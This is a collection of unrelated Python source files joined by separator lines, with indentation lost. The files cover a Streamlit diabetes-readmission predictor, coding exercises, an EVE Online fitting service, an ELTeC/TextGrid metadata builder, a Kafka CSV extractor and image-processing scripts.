race = st.sidebar.selectbox('Race', ('Caucasian', 'AfricanAmerican', 'Hispanic', 'Other', 'Asian'))
gender = st.sidebar.selectbox('Gender', ('Female', 'Male'))
binned_age = st.sidebar.selectbox('Age Group', ('[0-30)', '[30-60)', '[60-100)'))
A1Cresult = st.sidebar.selectbox('HbA1c Test Result', ('None', 'Norm', '>7', '>8'))
A1C_test = st.sidebar.selectbox('Got HbA1c Test?', (0, 1))
change = st.sidebar.selectbox('Change in Meds?', (0, 1))
A1C_test_and_changed = st.sidebar.selectbox('Got HbA1c Test and Change in Meds?', (0, 1))
time_in_hospital = st.sidebar.slider('Days in Hospital', 1, 14, 4)
num_lab_procedures = st.sidebar.slider('Num of Lab Procedures', 1, 132, 44)
num_procedures = st.sidebar.slider('Num of Procedures', 0, 6, 2)
num_medications = st.sidebar.slider('Num of Medications', 1, 79, 16)
number_outpatient = st.sidebar.slider('Num of Outpatient Visits', 0, 36, 1)
number_emergency = st.sidebar.slider('Num of Emergency Visits', 0, 42, 0)
number_inpatient = st.sidebar.slider('Num of Inpatient Visits', 0, 12, 0)
number_diagnoses = st.sidebar.slider('Num of Diagnoses', 3, 16, 7)
admission_type_id = st.sidebar.selectbox('Admission Type', (1, 2, 3, 4, 5, 6, 7, 8))
discharge_disposition_id = st.sidebar.slider('Discharge Disposition', 1, 28, 4)
admission_source_id = st.sidebar.slider('Admission Source', 1, 25, 4)
max_glu_serum = st.sidebar.selectbox('Max Glucose Serum', ('None', 'Norm', '>200', '>300'))
metformin = st.sidebar.selectbox('Prescribed Metformin?', ('No', 'Steady', 'Up', 'Down'))
glipizide = st.sidebar.selectbox('Prescribed Glipizide?', ('No', 'Steady', 'Up', 'Down'))
glyburide = st.sidebar.selectbox('Prescribed Glyburide?', ('No', 'Steady', 'Up', 'Down'))
insulin = st.sidebar.selectbox('Prescribed Insulin?', ('No', 'Steady', 'Up', 'Down'))
diabetesMed = st.sidebar.selectbox('Taking Other Diabetes Med?', ('No', 'Yes'))
diabetes_as_diag_1 = st.sidebar.selectbox('Diabetes as #1 Diagnosis? (Select one)', (0,1))
diabetes_as_diag_2 = st.sidebar.selectbox('Diabetes as #2 Diagnosis? (Select one)', (0,1))
diabetes_as_diag_3 = st.sidebar.selectbox('Diabetes as #3 Diagnosis? (Select one)', (0,1))
data = {'time_in_hospital': time_in_hospital,
'num_lab_procedures': num_lab_procedures,
'num_procedures': num_procedures,
'num_medications': num_medications,
'number_outpatient': number_outpatient,
'number_emergency': number_emergency,
'number_inpatient': number_inpatient,
'number_diagnoses': number_diagnoses,
'admission_type_id': admission_type_id,
'discharge_disposition_id': discharge_disposition_id,
'admission_source_id': admission_source_id,
'change': change,
'A1C_test': A1C_test,
'A1C_test_and_changed': A1C_test_and_changed,
'diabetes_as_diag_1': diabetes_as_diag_1,
'diabetes_as_diag_2': diabetes_as_diag_2,
'diabetes_as_diag_3': diabetes_as_diag_3,
'race': race,
'gender': gender,
'max_glu_serum': max_glu_serum,
'A1Cresult': A1Cresult,
'metformin': metformin,
'glipizide': glipizide,
'glyburide': glyburide,
'insulin': insulin,
'diabetesMed': diabetesMed,
'binned_age': binned_age
}
features = pd.DataFrame(data, index=[0])
return features
input_df = user_input_features()
df = pd.read_csv('https://query.data.world/s/fzhdybgova7pqh6amwfzrnhumdc26t')
# Data Cleaning Steps
df.drop_duplicates(subset='patient_nbr', inplace=True)
df.drop(['encounter_id','patient_nbr','weight', 'payer_code', 'medical_specialty'], axis=1, inplace=True)
df = df[df.race != '?'] # about 1,000 obs
df = df[df.gender != 'Unknown/Invalid'] # 1 obs
df.readmitted.replace({'NO': 0, '<30': 1, '>30': 2}, inplace=True)
df = df[pd.to_numeric(df['diag_1'], errors='coerce').notnull()]
df = df[pd.to_numeric(df['diag_2'], errors='coerce').notnull()]
df = df[pd.to_numeric(df['diag_3'], errors='coerce').notnull()]
df.diag_1 = df.diag_1.astype('float64')
df.diag_2 = df.diag_2.astype('float64')
df.diag_3 = df.diag_3.astype('float64')
# Feature Engineering
df['A1C_test'] = np.where(df.A1Cresult == 'None', 0, 1)
df.change = np.where(df.change == 'No', 0, 1)
df['A1C_test_and_changed'] = np.where((df.change == 1) & (df.A1C_test == 1), 1, 0)
conditions = [
(df.age == '[0-10)') | (df.age == '[10-20)') | (df.age == '[20-30)'),
(df.age == '[30-40)') | (df.age == '[40-50)') | (df.age == '[50-60)'),
(df.age == '[60-70)') | (df.age == '[70-80)') | (df.age == '[80-90)') | (df.age == '[90-100')]
choices = [
'[0-30)',
'[30-60]',
'[60-100)']
df['binned_age'] = np.select(conditions, choices, default=np.nan)
df = df[df.binned_age != 'nan']
df.drop(['age'], axis=1, inplace=True)
df['diabetes_as_diag_1'] = np.where((df.diag_1 >= 250) & (df.diag_1 <251), 1, 0)
df['diabetes_as_diag_2'] = np.where((df.diag_2 >= 250) & (df.diag_2 <251), 1, 0)
df['diabetes_as_diag_3'] = np.where((df.diag_3 >= 250) & (df.diag_3 <251), 1, 0)
df.drop(['diag_1', 'diag_2', 'diag_3'], axis=1, inplace=True)
meds_to_remove = ['repaglinide', 'nateglinide', 'chlorpropamide', 'glimepiride', 'acetohexamide', 'tolbutamide',
'pioglitazone', 'rosiglitazone', 'acarbose', 'miglitol', 'troglitazone', 'tolazamide', 'examide',
'citoglipton', 'glyburide-metformin', 'glipizide-metformin', 'glimepiride-pioglitazone',
'metformin-rosiglitazone', 'metformin-pioglitazone']
df.drop(meds_to_remove, axis=1, inplace=True)
X = df.drop('readmitted', axis = 1)
df = pd.concat([input_df, X], axis=0)
encode = ['race', 'gender', 'max_glu_serum', 'A1Cresult', 'metformin', 'glipizide', 'glyburide',
'insulin', 'diabetesMed', 'binned_age']
for col in encode:
dummy = pd.get_dummies(df[col], prefix=col)
df = pd.concat([df, dummy], axis=1)
del df[col]
df = df[:1]
#Write out input selection
st.subheader('User Input (Pandas DataFrame)')
st.write(df)
#Load in model
load_clf = pickle.load(open('diabetes_model.pkl', 'rb'))
# Apply model to make predictions
prediction = load_clf.predict(df)
prediction_proba = load_clf.predict_proba(df)
st.subheader('Prediction')
st.write("""
This is a multi-class classification model. Options are:
1) 'NO' --> this patient was not readmitted within a year,
2) '<30' --> this patient was readmitted within 30 days, or
3) '>30' --> this patient was readmitted after 30 days.
This generally corresponds to the severity of the patient's diabetes as well as the specific care, or lack thereof, during the visit.
""")
readmitted = np.array(['NO','<30','>30'])
st.write(readmitted[prediction])
st.subheader('Prediction Probability')
st.write("""
0 --> 'NO'
1 --> '<30'
2 --> '>30'
""")
st.write(prediction_proba)
st.subheader('Exploratory Data Analysis')
st.write("""
We identified some important features in the readmittance rate that you can explore below. To begin, here is the distribution
of the classes in the original data set. We see that a majority of patients are not readmitted within a year. Patients that
are readmitted often have complications to their diabetes or the specific care recieved.
""")
st.image(Image.open('Images/Readmit_rate.png'), width = 500)
st.write("""
Now looking at the patient population given the long-term blood sugar HbA1c test, we see only about 20% of patients received
this test, but, of those, 50% then had their medication changed and were less likely to be readmitted.
""")
st.image(Image.open('Images/HbA1c_test.png'), width = 500)
st.write("""
Finally, we see that age plays an important role. As expected, older patients have more complications due to their diabetes.
Age was binned according to this chart into 0-30, 30-60, and 60-100.
""")
st.image(Image.open('Images/Readmit_vs_age.png'), width = 500)
st.subheader('More Information')
st.write("""
For a deeper dive into the project, please visit the [repo on GitHub](https://github.com/ArenCarpenter/Diabetes_Hospitalizations)
where you can find all the code used in analysis, modeling, visualizations, etc. You can also read my
[articles](https://arencarpenter.medium.com/) in Towards Data Science on my other projects.
""")
|
#!/usr/bin/python3
class Square():
"""Empty class square."""
def __init__(self, size):
"""init square function."""
self.__size = size
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'dir2_target',
'type': 'none',
'dependencies': [
'../dir1/dir1.gyp:dir1_target',
],
'actions': [
{
'inputs': [ ],
'outputs': [ '<(PRODUCT_DIR)/file.txt' ],
'action_name': 'Test action',
'action': ['cp', 'file.txt', '${BUILT_PRODUCTS_DIR}/file.txt' ],
},
],
},
],
}
|
#!/usr/bin/python
def numDivisors(n):
count = 0
j = 1
max = n
while j < max:
if n % j == 0:
count += 2
max = n / j
j += 1
return count
i = 2
num = 1
while numDivisors(num) <= 500:
num += i
i += 1
print(num)
|
from eos import Fit, Ship, ModuleHigh, ModuleMed, ModuleLow, Rig, Implant, Drone, Charge, State, Skill
from ..eve_static_data.consts import CAT_SKILLS
from ..extensions import cache
from ..eve_static_data import eve_static_data_service
class PyfaEosService(object):
def build_high_module(self, type_id, state, charge_type_id):
return self._build_module(ModuleHigh, type_id, state, charge_type_id)
def build_mid_module(self, type_id, state, charge_type_id):
return self._build_module(ModuleMed, type_id, state, charge_type_id)
def build_low_module(self, type_id, state, charge_type_id):
return self._build_module(ModuleLow, type_id, state, charge_type_id)
def _build_module(self, module_class, type_id, state, charge_type_id):
converted_state = self.convert_state(state)
if charge_type_id is not None:
charge = Charge(charge_type_id)
else:
charge = None
if converted_state is not None:
module = module_class(type_id, state=converted_state, charge=charge)
else:
module = module_class(type_id, charge=charge)
return module
@staticmethod
def build_rig(type_id):
return Rig(type_id)
@staticmethod
def build_implant(type_id):
return Implant(type_id)
def build_drone(self, type_id, state):
converted_state = self.convert_state(state)
if converted_state is not None:
drone = Drone(type_id, state=converted_state)
else:
drone = Drone(type_id)
return drone
@staticmethod
def build_ship(type_id):
return Ship(type_id)
@staticmethod
def convert_state(state):
if state is not None:
if state is 'online':
return State.online
elif state is 'offline':
return State.offline
elif state is 'active':
return State.active
elif state is 'overload':
return State.overload
return None
@staticmethod
def build_full_fit(ship, skills=None, highs=None, mids=None, lows=None, rigs=None, implants=None, drones=None):
fit = Fit()
fit.ship = ship
if skills is not None:
for skill in skills:
fit.skills.add(skill)
if highs is not None:
for hi in highs:
fit.modules.high.equip(hi)
if mids is not None:
for mid in mids:
fit.modules.med.equip(mid)
if lows is not None:
for lo in lows:
fit.modules.low.equip(lo)
if rigs is not None:
for rig in rigs:
fit.rigs.equip(rig)
if implants is not None:
for imp in implants:
fit.implants.add(imp)
if drones is not None:
for drone in drones:
fit.drones.add(drone)
return fit
@staticmethod
def build_skill(skill_id, level=5):
return Skill(skill_id, level)
@cache.memoize()
def build_all_v_character(self):
skills_category = CAT_SKILLS
skill_types = eve_static_data_service.get_types_by_category(skills_category)
return [self.build_skill(x.typeID) for x in skill_types]
pyfa_eos_service = PyfaEosService()
|
import numpy
import os
import shutil
import random
"""
将图像路径和label写入txt文件
"""
datapath = "D:/project/tensorflow-vgg/test_data"
labels = os.listdir(datapath)
filetxt = open("test_label.txt","w")
idx = -1
for dirpath,dirs,files in os.walk(datapath):
for file in files:
label = labels[idx]
one_hot_label = [1 if i == int(label) else 0 for i in range(len(labels))]
writepath = os.path.join(dirpath,file)
filetxt.write(writepath)
filetxt.write(' ')
filetxt.write(label)
filetxt.write('\n')
idx += 1
filetxt.close()
#"""
#将数据r5中的,没有出现在训练数据r20中的数据,挑出来存放
#"""
def getairplane(filename):
airplane = filename[:filename.index('_')]
if 'A-10' in airplane:
idx1 = filename.index('-')
idx2 = filename[idx1+1:].index('-')
idx = idx1+idx2+1
airplane = airplane[:idx]
return airplane
def get_label_name(airplane):
synset = "./synset.txt" #里面记录了机型对应的label
synfile = open(synset,'r')
while 1:
line = synfile.readline()
if line == '':
print('not found the airplane')
exit()
(feiji,label) = line.split()
if airplane == feiji:
return label
def getpath(path,filename):
for dirpath,dirs,files in os.walk(path):
for file in files:
if file == filename:
dst = os.path.join(dirpath,file)
return dst
def getallimgname(datapath):
allname = []
for dirpath,dirs,files in os.walk(datapath):
for file in files:
if file.endswith('bmp') == True :
allname.append(file)
return allname
#if __name__ == "__main__":
# datapath_r5 = "D:/project/airplane_data/dataset-r5/image"
# datapath_r20 = "D:/project/airplane_data/dataset-r20/img"
# savepath = "D:/project/tensorflow-vgg/test_data"
# for name in getallimgname(datapath_r5):
# r20names = getallimgname(datapath_r20)
# if name in r20names:
# continue
# airplane = getairplane(name)
# label = get_label_name(airplane)
# dst = os.path.join(savepath,label)
# if os.path.exists(dst) == False:
# os.makedirs(dst)
# dst = os.path.join(dst,name)
# src = getpath(datapath_r5,name)
# shutil.copy(src,dst)
#"""
#将所有图像移动为测试集和训练集
#图像组织结构
#|---0
#|——————xxx.jpeg
#|---1
#"""
#if __name__ =="__main__":
# root_dir = "D:/project/tensorflow-vgg/alldata"
# test_dir = "D:/project/tensorflow-vgg/test_data"
# train_dir = "D:/project/tensorflow-vgg/train_data"
# f = getallimgname(root_dir)
# random.shuffle(f)
# trainnum = int(len(f)/5*4)
# index = 0
# for i in f:
# airplane = getairplane(i)
# label = get_label_name(airplane)
# if (index < trainnum)== True :
# index +=1
# src = getpath(root_dir,i)
# dst = os.path.join(train_dir,label)
# if os.path.exists(dst) == False:
# os.makedirs(dst)
# dst = os.path.join(dst,i)
# shutil.copy(src,dst)
# else:
# index +=1
# src = getpath(root_dir,i)
# dst = os.path.join(test_dir,label)
# if os.path.exists(dst) == False:
# os.makedirs(dst)
# dst = os.path.join(dst,i)
# shutil.copy(src,dst)
|
class Solution(object):
def removeDuplicates(self, nums):
n = len(nums)
if n == 0:
return 0
k = nums[0]
count = 1
i = 1
delete = 0
while i+delete<n:
if nums[i] == k:
count += 1
else:
count = 1
k = nums[i]
if count>2:
nums.pop(i)
i -= 1
count-=1
delete += 1
i += 1
print(nums)
return len(nums)
|
#!/usr/bin/env python3
"""
Script for creating the various files required for import of data into
the TextGrid Repository.
The script requires the metadata file produced in the previous step and
the full XML-TEI files to be uploaded.
Usage: The only parameter you should need to adjust is the path
encoded in the variable "collection" to be worked on.
File preparation is one one language at a time.
Output: The script writes a collection of files to the output folder for
the language collection concerned.
Please send feedback to Christof at "schoech@uni-trier.de".
"""
# === Import statements ===
import os
import re
import glob
from os.path import join
from os.path import basename
import pandas as pd
from collections import Counter
import lxml.etree as ET
from bs4 import BeautifulSoup as soup
# === Files and folders ===
collection = "ELTeC-por"
level = "level1"
# === Helper functions ===
def read_metadatafile(metadatafile):
with open(metadatafile, "r", encoding="utf8") as infile:
metadata = pd.read_csv(infile, sep="\t", index_col="xmlid")
return metadata
def read_template(templateid):
templatefile = join("templates", templateid)
with open(templatefile, "r", encoding="utf8") as infile:
template = infile.read()
return template
def save_template(template, language, templatefile, outputlevel):
# saves all files
# outputlevel creates the correct folder directory for each file
new_folder = templatefile.split(".")[0]
new_folder = re.sub("-", "", new_folder)
outputlevel0 = "output"
col_folder = join("output", "ELTeC")
LLL_level = join("output", "ELTeC", language)
LLLNNN_level = join("output", "ELTeC", language, new_folder)
# create collection-file if it doesn't already exists
if not os.path.exists(col_folder):
os.makedirs(col_folder)
if not os.path.exists(LLL_level):
os.makedirs(LLL_level)
if outputlevel == 0:
path = outputlevel0
elif outputlevel == 1:
path = col_folder
elif outputlevel == 2:
path = LLL_level
elif outputlevel == 3:
if not os.path.exists(LLLNNN_level):
os.makedirs(LLLNNN_level)
path = LLLNNN_level
else:
print("Something went wrong with directories.")
with open(join(path, templatefile), "w", encoding="utf8") as outfile:
outfile.write(template)
def check_date(date):
date =str(date)
if len(date)>=4 and date[:4].isdigit():
notBefore = date[:4]
if len(date)>= 9 and date[5:].isdigit():
notAfter = date[5:]
else:
notAfter = notBefore
else:
notBefore ="NA"
notAfter = "NA"
if notBefore == notAfter:
date = notBefore
else:
date = notBefore+"-"+notAfter
return date, notBefore, notAfter
# === Functions to fill template files: (Eltec-)collection files ===
def fill_collection(language, collection_files_list):
templatefile = "CCC.collection"
template = read_template(join(templatefile))
template = re.sub("CCC", "ELTeC", template)
template = re.sub('<ore:aggregates rdf:resource="ELTeC/-LLL.aggregation"/>', "", template)
# parses the file as bs4-object and fills in each rdf_resource, i.e. edition used
template = soup(template, "xml")
for col in collection_files_list:
rdf_tag = template.find({"rdf:Description"})
new_tag = template.new_tag("ore:aggregates")
new_tag.attrs["rdf:resource"] = "{}/{}".format("ELTeC", col)
new_tag.append("")
rdf_tag.append(new_tag)
template = template.prettify()
templatefile = re.sub("CCC", "ELTeC", templatefile)
# save file
save_template(str(template), language, templatefile, 0)
def fill_collection_meta(language):
templatefile = "CCC.collection.meta"
template = read_template(join(templatefile))
template = re.sub("CCC", "ELTeC", template)
templatefile = re.sub("CCC", "ELTeC", templatefile)
save_template(template, language, templatefile, 0)
# === Functions to fill template files: one per language ===
def fill_aggregation_meta(language):
templatefile = "-LLL.aggregation.meta"
template = read_template(join("CCC", templatefile))
template = re.sub("LLL", language, template)
templatefile = re.sub("LLL", language, templatefile)
save_template(template, language, templatefile, 1)
def fill_LLL_aggregation(language, aggregation_list):
# fills the LLL.aggregation-file using a list of all edition-files
# Read the emtpy template-file
templatefile = "-LLL.aggregation"
template = read_template(join("CCC", templatefile))
# Changes filename and description-tag
templatefile = re.sub("LLL", language, templatefile)
template = re.sub('<rdf:Description rdf:about="-LLL.aggregation">',
'<rdf:Description rdf:about="-{}.aggregation">'.format(language), template)
# parses the file as bs4-object and fills in each rdf_resource, i.e. edition used
template = soup(template, "xml")
for ed in aggregation_list:
rdf_tag = template.find({"rdf:Description"})
new_tag = template.new_tag("ore:aggregates")
new_tag.attrs["rdf:resource"] = "{}/{}".format(language, ed)
new_tag.append("")
rdf_tag.append(new_tag)
template = template.prettify()
# save file
save_template(str(template), language, templatefile, 1)
# === Functions to fill template files: one per text ===
def get_metadata_information(xmlfile, metadata):
# identifier
if "_" in basename(xmlfile):
identifier= basename(xmlfile).split("_")[0]
else:
identifier= basename(xmlfile).split(".")[0]
# author
try:
author = metadata.loc[identifier, "author"]
# if xmlif doesnt match the filename, try to look for it
except KeyError:
testid = re.search("\d+", basename(xmlfile).split("_")[0]).group(0)
for row in metadata.index:
if re.search(testid, row):
print("Please check id for validation")
identifier = row
author = metadata.loc[identifier, "author"]
# title
title = metadata.loc[identifier, "title"]
# first edition and print edition
firstedition = metadata.loc[identifier, "firstedition"]
notBefore, notAfter, date = check_date(firstedition)
if date == "NA":
printedition = metadata.loc[identifier, "printedition"]
notBefore, notAfter, date = check_date(printedition)
# authorid, i.e. viaf or gnd
authorid = str(metadata.loc[identifier, "authorid"])
if re.search("gnd", authorid) or re.search("viaf", authorid):
try:
authorid = re.sub(r' wikidata(.*?)$', "", authorid)
except TypeError:
authorid = str(authorid)
if re.search("viaf.org", authorid):
authorid = re.search("https://viaf.org/viaf/(.*?)/", authorid).group(1)
authorid = "viaf:" + authorid
elif re.search("d-nb.info/gnd", authorid):
authorid = re.search("http://d-nb.info/gnd/(.*?)", authorid).group(1)
authorid = "gnd:" + authorid
print(authorid)
else:
authorid = ""
# gender
gender = metadata.loc[identifier, "gender"]
# size
size = metadata.loc[identifier, "size"]
# reprints
reprints = metadata.loc[identifier, "reprints"]
# timeslot
timeslot = metadata.loc[identifier, "timeslot"]
# timeslot
pubPlace = metadata.loc[identifier, "pubplace"]
return identifier, author, title, date, notBefore, notAfter, authorid, gender, size, reprints, timeslot, pubPlace
def fill_LLLNNN_edition_meta(xmlfile, counter, language, author, title, date, authorid, pubPlace):
# Read the empty templatefile
templatefile = "LLLNNN.edition.meta"
template = read_template(join("CCC", "LLL", templatefile))
template = re.sub("LLL", language, template)
# Fill information into the template
template = re.sub("LLL", language, template)
template = re.sub("NNN", counter, template)
template = re.sub("#author#", author, template)
template = re.sub("#title#", title, template)
template = re.sub("#edition#", str(date), template)
template = re.sub("#place#", str(pubPlace), template)
if not authorid == "":
template = re.sub("#xxx#", authorid, template)
else:
template = re.sub(' id="#xxx#"', "", template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
# templatefile = join(language, templatefile)
# Save the individual, filled-in templatefile
save_template(template, language, templatefile, 2)
def fill_LLL_LLLNNN_edition(xmlfile, counter, language):
# Read the empty templatefile
templatefile = "LLLNNN.edition"
template = read_template(join("CCC", "LLL", templatefile))
# Fill information into the template
template = re.sub("LLL", language, template)
template = re.sub("NNN", counter, template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
# Save the individual, filled-in templatefile
save_template(template, language, templatefile, 2)
def fill_LLL_LLLNNN_xml(xmlfile, counter, language):
# get template-file-name
templatefile = "-LLLNNN.xml"
# read the xml-file
with open(xmlfile, "r", encoding="utf8") as infile:
template = infile.read()
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
# save xml-file
save_template(template, language, templatefile, 3)
def fill_LLL_LLLNNN_xml_meta(xmlfile, counter, language, title):
# read emtpy template-file
templatefile = "-LLLNNN.xml.meta"
template = read_template(join("CCC", "LLL", "LLLNNN", templatefile))
template = re.sub("#title#", title, template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
save_template(template, language, templatefile, 3)
def fill_LLL_LLLNNN_work(xmlfile, counter, language):
# read empty template-file
templatefile = "LLLNNN.work"
template = read_template(join("CCC", "LLL", "LLLNNN", templatefile))
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
save_template(template, language, templatefile, 3)
def fill_LLL_LLLNNN_work_meta(xmlfile, counter, language, author, title, date, notBefore, notAfter, gender, size, reprints, timeslot, authorid):
templatefile = "LLLNNN.work.meta"
template = read_template(join("CCC", "LLL", "LLLNNN", templatefile))
# Fill information into the template
template = re.sub("#author#", author, template)
template = re.sub("#title#", title, template)
template = re.sub("#notBEdition#", str(notBefore), template)
template = re.sub("#notAEdition#", str(notAfter), template)
template = re.sub("#edition#", str(date), template)
template = re.sub("#authorGender#", gender, template)
template = re.sub("#size#", size, template)
template = re.sub("#reprintCount#", str(reprints), template)
template = re.sub("#timeSlot#", timeslot, template)
if not authorid == "":
template = re.sub("#xxx#", authorid, template)
else:
template = re.sub(' id="#xxx#"', "", template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
save_template(template, language, templatefile, 3)
# === Main ===
def main(collection, level):
language = collection[-3:].upper()
metadatafile = join("metadata", collection + ".tsv")
metadata = read_metadatafile(metadatafile)
xmlfiles = join("input", collection, level, "*.xml")
fill_collection_meta(language)
fill_aggregation_meta(language)
counter = 0
for xmlfile in glob.glob(xmlfiles):
counter += 1
counter = "{:03}".format(counter)
print(counter, basename(xmlfile))
identifier, author, title, date, notBefore, notAfter, authorid, gender, size, reprints, timeslot, pubPlace = get_metadata_information(xmlfile, metadata)
fill_LLLNNN_edition_meta(xmlfile, counter, language, author, title, date, authorid, pubPlace)
fill_LLL_LLLNNN_edition(xmlfile, counter, language)
fill_LLL_LLLNNN_xml(xmlfile, counter, language)
fill_LLL_LLLNNN_xml_meta(xmlfile, counter, language, title)
fill_LLL_LLLNNN_work(xmlfile, counter, language)
fill_LLL_LLLNNN_work_meta(xmlfile, counter, language, author, title, date, notBefore, notAfter, gender, size, reprints, timeslot, authorid)
counter = int(counter)
# creates a list of all current edition-files in folder output/LLL/*.edition
aggregation_files_list = []
aggregation_files_path = join("output", "ELTeC", language, "*.edition")
for file in glob.glob(aggregation_files_path):
aggregation_files_list.append(basename(file))
fill_LLL_aggregation(language, aggregation_files_list)
collection_files_list = []
collection_files_path = join("output", "ELTeC", "*.aggregation")
for file in glob.glob(collection_files_path):
collection_files_list.append(basename(file))
fill_collection(language, collection_files_list)
main(collection, level)
|
#!/usr/bin/env python
aTup = ('I', 'am', 'a', 'test', 'tuple')
res = ()
for i in range( len(aTup) ):
if i%2 == 0:
res += ( aTup[i], )
print res
|
"""treadmill.dirwatch tests"""
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'zq'
import sys
import yaml
import socket
import os
from kafka import KafkaProducer
from datetime import *
"""
kafka-broker-list: kafka100:9092
kafka-topic: demo
filepath : sample.csv
offset : 0
interval : 7
learning : 100
column : 1,2
url : http://localhost:8080/health
"""
yaml_filename = 'extract.yaml'
f = open(yaml_filename)
config = yaml.load(f)
def refresh_yaml() :
with open(yaml_filename, 'w') as yaml_file:
yaml.dump(config, yaml_file, default_flow_style=False)
def get_column_by_max(filepath,learning = 0):
"""
returns normal number of columns by guess
"""
max_column = 0
num_line = 0
with open(filepath) as f:
for lines in f:
line = lines.rstrip('\n')
num_column = len(line.split(","))
max_column = num_column if num_column > max_column else max_column
num_line +=1
if num_line > learning :
break
return max_column
def get_column_by_score(filepath,offset = 0 , learning = 1):
"""
returns normal number of columns by guess
"""
score = {}
num_line = 0
with open(filepath) as f:
f.seek(offset)
for lines in f:
line = lines.rstrip('\n')
num_column = len(line.split(","))
print(" num_column %s " % num_column)
key = num_column
if key not in score :
score[key] = 1
else :
count = score[key]
count += 1
score[key] = count
num_line +=1
if num_line > learning :
break
column_score = 0
max_score = 0
for (k,v) in score.items() :
if v > max_score :
max_score = v
column_score = int(k)
return column_score
def request(data):
print(data)
def get_error_path(fin_path) :
return '$' + fin_path
def get_fout_path(fin_path) :
return '_'+ fin_path
def get_final_ok_path(fin_path) :
return 'ok_'+ fin_path
def get_final_error_path(fin_path) :
return 'error_'+fin_path
def rename(source_filename,target_filename) :
if os.path.exists(target_filename) and os.path.isfile(target_filename):
os.remove(target_filename)
os.rename(source_filename,target_filename)
def error(fin_path,error_path,final_error_path,error_number) :
if error_number > 1 :
final_error_path = get_final_error_path(fin_path)
rename(error_path,final_error_path)
else :
os.remove(error_path)
def get_kafka_brokerlist() :
return config['kafka-broker-list']
def get_kafka_topic() :
return config['kafka-topic']
def extract(fin_path,offset = 0,interval = 10000 , recommend = 1):
line_number = 0
error_number = 0
current_offset = offset
fout_path = get_fout_path(fin_path)
error_path = get_error_path(fin_path)
with open(fin_path) as fin,open(fout_path, "a") as fout, \
open(error_path,'a') as ferror:
fin.seek(offset)
for raw_line in fin:
current_offset += len(raw_line)
config['offset'] = current_offset
print("offset : %s" % current_offset)
line = raw_line.rstrip('\n')
num_column = len(line.split(","))
if num_column >= recommend :
fout.write(raw_line)
else:
error_number += 1
ferror.write(raw_line)
if line_number < interval :
line_number += 1
else :
refresh_yaml()
line_number = 0
rename(fout_path,get_final_ok_path(fin_path))
error(fin_path,error_path,get_final_error_path(fin_path),error_number)
def extract_to_kafka(fin_path,offset = 0,interval = 10000 , recommend = 1) :
line_number = 0
error_number = 0
current_offset = offset
fout_path = get_fout_path(fin_path)
error_path = get_error_path(fin_path)
producer = KafkaProducer(bootstrap_servers=get_kafka_brokerlist())
with open(fin_path) as fin,open(error_path,'a') as ferror:
fin.seek(offset)
for raw_line in fin:
current_offset += len(raw_line)
config['offset'] = current_offset
print("offset : %s" % current_offset)
line = raw_line.rstrip('\n')
num_column = len(line.split(","))
#producer.send('raw', raw_line.encode('utf-8'))
if num_column >= recommend :
producer.send(get_kafka_topic() , raw_line.encode('utf-8'))
else:
error_number += 1
ferror.write(raw_line)
if line_number < interval :
line_number += 1
else :
refresh_yaml()
line_number = 0
producer.flush()
error(fin_path,error_path,get_final_error_path(fin_path),error_number)
def get_local_ip():
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
def get_datetime():
datetime_now = datetime.now()
return datetime_now
def get_data():
data = "ip:%s,starttime:%s,filepath:%s,learning:%s,offset:%s,column:%s" % \
(get_local_ip(),get_datetime(),config['filepath'],config['learning'], \
config['offset'],config['column'])
return {"status":"error","data":data}
def init():
print(config)
def run() :
init()
fin_path = config['filepath']
offset = config['offset']
interval = config['interval']
recommend = get_column_by_score(fin_path)
extract_to_kafka(fin_path,offset,interval,recommend)
if __name__ == "__main__" :
run()
|
A=int(input("A= "))
print((A>99)and(A<1000)and(A%2!=0))
|
import sys
sys.path.insert(0, '/usr/local/blocked')
from BlockedFrontend.server import app as application
|
from django.apps import AppConfig
class CustomstrategyConfig(AppConfig):
name = 'CustomStrategy'
verbose_name='自定义策略'
|
def filter_long_words(sentence, n):
return [x for x in sentence.split() if len(x)>n]
'''
Write a function filter_long_words that takes a string sentence and an integer n.
Return a list of all words that are longer than n.
Example:
filter_long_words("The quick brown fox jumps over the lazy dog", 4)
= ['quick', 'brown', 'jumps']
'''
|
import cv2
import numpy as np
from PIL import Image
def binarize(img):
'''
functions:
将截取的图片进行二值化
'''
#--将PIL.Image.Image转化为OpenCV的格式
# 并转为灰度化图像
img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
#设定阈值 进行二值化
threshold = 200
param = cv2.THRESH_BINARY
ret,processed = cv2.threshold(img,threshold,255,param)
print(type(processed))
#cv2.imshow("win100",img)
#cv2.imshow("win001",processed)
#cv2.waitKey(0)
return processed#返回类型为numpy.ndarray的二值化图像
for i in range(0,13):
filename = str(i)+".png"
print(filename)
temp = cv2.imread(filename)
#cv2.imshow(filename,temp)
#cv2.waitKey(0)
cv2.imwrite("bin/"+filename,binarize(temp))
|
import os
import numpy as np
import pandas as pd
import pickle
import msgpack
import copy
import pulp
from fdsim.helpers import create_service_area_dict
import sys; sys.path.append("../../work")
from spyro.utils import obtain_env_information, make_env, progress
STATION_NAME_TO_AREA = {
'ANTON': '13781551',
'AALSMEER': '13670052',
'AMSTELVEEN': '13710131',
'DIRK': '13780387',
'DIEMEN': '13560037',
'DRIEMOND': '13780419',
'DUIVENDRECHT': '13750041',
'HENDRIK': '13780449',
'NICO': '13781234',
'UITHOORN': '13760075',
'OSDORP': '13780011',
'PIETER': '13780057',
'TEUNIS': '13780583',
'VICTOR': '13780255',
'WILLEM': '13780402',
'IJSBRAND': '13780162',
